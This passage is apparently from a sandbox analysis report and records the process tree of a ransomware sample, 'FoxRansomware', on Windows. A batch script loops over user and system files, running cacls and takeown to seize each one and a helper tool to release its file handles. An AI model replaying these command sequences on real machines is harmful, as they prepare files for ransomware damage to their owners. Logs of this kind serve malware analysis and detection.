C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4412
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin""2⤵PID:5224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin" /E /G Admin:F /C3⤵PID:2712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin"3⤵PID:5876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000015.bin" -nobanner3⤵PID:6028
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000015.bin" -nobanner4⤵PID:1096
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:5732
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:5712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵PID:3196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:6036
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:6092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:5520
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:5976
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:3160
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:592
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:7152
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log""2⤵PID:920
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log" /E /G Admin:F /C3⤵PID:5168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log"3⤵PID:5216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "edb00001.log" -nobanner3⤵PID:192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "edb00001.log" -nobanner4⤵PID:4352
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- System Location Discovery: System Language Discovery
PID:316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""2⤵PID:6088
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C3⤵PID:6176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"3⤵
- Modifies file permissions
PID:4892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftLync2010.xml" -nobanner3⤵PID:6212
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftLync2010.xml" -nobanner4⤵PID:6048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""2⤵PID:5816
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C3⤵PID:7476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"3⤵
- Modifies file permissions
PID:5780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner3⤵
- System Location Discovery: System Language Discovery
PID:3620 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner4⤵PID:7504
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""2⤵PID:3356
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C3⤵PID:6268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"3⤵
- Modifies file permissions
PID:620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner3⤵PID:4784
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner4⤵PID:6992
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:1800
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:6336
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵PID:6368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:6364
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:6576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin""2⤵PID:6508
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin" /E /G Admin:F /C3⤵PID:1300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin"3⤵PID:3144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000000F.bin" -nobanner3⤵PID:6460
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000000F.bin" -nobanner4⤵PID:6640
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin""2⤵PID:6568
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin" /E /G Admin:F /C3⤵PID:7496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin"3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000000Q.bin" -nobanner3⤵PID:6668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000000Q.bin" -nobanner4⤵PID:5912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin""2⤵PID:6752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin" /E /G Admin:F /C3⤵PID:6764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin"3⤵
- System Location Discovery: System Language Discovery
PID:6908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000014.bin" -nobanner3⤵PID:6716
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000014.bin" -nobanner4⤵PID:6792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6696
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin""2⤵PID:6952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin" /E /G Admin:F /C3⤵PID:5412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin"3⤵PID:6896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000058.bin" -nobanner3⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000058.bin" -nobanner4⤵PID:6940
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin""2⤵PID:5544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin" /E /G Admin:F /C3⤵PID:7372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin"3⤵PID:5772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000007E.bin" -nobanner3⤵PID:6492
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000007E.bin" -nobanner4⤵PID:5708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin""2⤵PID:7320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin" /E /G Admin:F /C3⤵PID:2228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin"3⤵PID:2336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000007O.bin" -nobanner3⤵PID:7560
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000007O.bin" -nobanner4⤵PID:7456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin""2⤵PID:5444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin" /E /G Admin:F /C3⤵PID:7256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin"3⤵PID:7468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000006H.bin" -nobanner3⤵PID:7772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000006H.bin" -nobanner4⤵PID:8004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin""2⤵PID:7280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin" /E /G Admin:F /C3⤵PID:7656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin"3⤵PID:288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000075.bin" -nobanner3⤵PID:7264
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000075.bin" -nobanner4⤵PID:7308
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin""2⤵PID:7936
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin" /E /G Admin:F /C3⤵PID:7748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin"3⤵PID:4800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000083.bin" -nobanner3⤵PID:7708
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000083.bin" -nobanner4⤵PID:7752
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin""2⤵PID:7904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin" /E /G Admin:F /C3⤵PID:7952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin"3⤵PID:8044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000009F.bin" -nobanner3⤵PID:7696
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000009F.bin" -nobanner4⤵PID:8052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin""2⤵PID:7932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin" /E /G Admin:F /C3⤵
- System Location Discovery: System Language Discovery
PID:5832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin"3⤵PID:8172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "000000AL.bin" -nobanner3⤵PID:8080
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "000000AL.bin" -nobanner4⤵PID:5548
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin""2⤵PID:8120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin" /E /G Admin:F /C3⤵PID:6132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin"3⤵PID:7084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "000000B1.bin" -nobanner3⤵PID:8184
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "000000B1.bin" -nobanner4⤵PID:7068
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\edbtmp.log""2⤵PID:5036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\edbtmp.log" /E /G Admin:F /C3⤵PID:1976
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\edbtmp.log"3⤵PID:5984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "edbtmp.log" -nobanner3⤵PID:2968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "edbtmp.log" -nobanner4⤵PID:5376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.jfm""2⤵PID:2332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.jfm" /E /G Admin:F /C3⤵PID:5788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.jfm"3⤵
- Modifies file permissions
PID:4324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "IndexedDB.jfm" -nobanner3⤵PID:5980
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "IndexedDB.jfm" -nobanner4⤵PID:5180
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin""2⤵PID:4188
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin" /E /G Admin:F /C3⤵PID:4508
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin"3⤵PID:5276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000008D.bin" -nobanner3⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000008D.bin" -nobanner4⤵PID:588
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin""2⤵PID:6044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin" /E /G Admin:F /C3⤵PID:5496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin"3⤵PID:5688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000008N.bin" -nobanner3⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000008N.bin" -nobanner4⤵PID:4148
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin""2⤵PID:2232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin" /E /G Admin:F /C3⤵PID:1544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin"3⤵PID:6184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000093.bin" -nobanner3⤵PID:6020
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000093.bin" -nobanner4⤵PID:5640
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1248
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin""2⤵PID:1460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin" /E /G Admin:F /C3⤵PID:5304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin"3⤵PID:2840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "000000A9.bin" -nobanner3⤵PID:5504
-
